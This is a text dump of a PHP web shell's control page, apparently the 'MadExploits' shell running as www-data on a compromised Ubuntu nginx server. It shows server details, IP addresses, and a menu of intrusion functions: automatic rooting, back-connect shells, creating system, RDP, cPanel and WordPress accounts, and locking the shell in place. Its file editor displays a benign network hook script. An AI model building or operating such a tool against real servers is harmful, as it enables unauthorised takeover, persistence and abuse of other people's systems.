Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
snap /
core /
17247 /
etc /
network /
if-down.d /
[ HOME SHELL ]
Name
Size
Permission
Action
resolvconf
256
B
-rwxr-xr-x
ubuntu-fan
548
B
-rwxr-xr-x
upstart
332
B
-rwxr-xr-x
wpasupplicant
4.59
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ubuntu-fan
#!/bin/sh set -e case "$IFACE" in lo) exit 0 ;; fan-*) exit 0 ;; esac case "$ADDRFAM" in inet) ;; *) exit 0 ;; esac # NOTE: NetworkManager simply does not call out to the normal # down hooks as it only checks _after_ the interface has # been lost. Roll with this. case "$PHASE::$METHOD" in post-up::static|post-up::dhcp|post-up::NetworkManager) ;; pre-down::static|pre-down::dhcp|post-down::NetworkManager) ;; *) exit 0 ;; esac case "$MODE" in start|stop) ;; *) exit 0 ;; esac /usr/sbin/fanctl net "$MODE" "$IFACE"
Close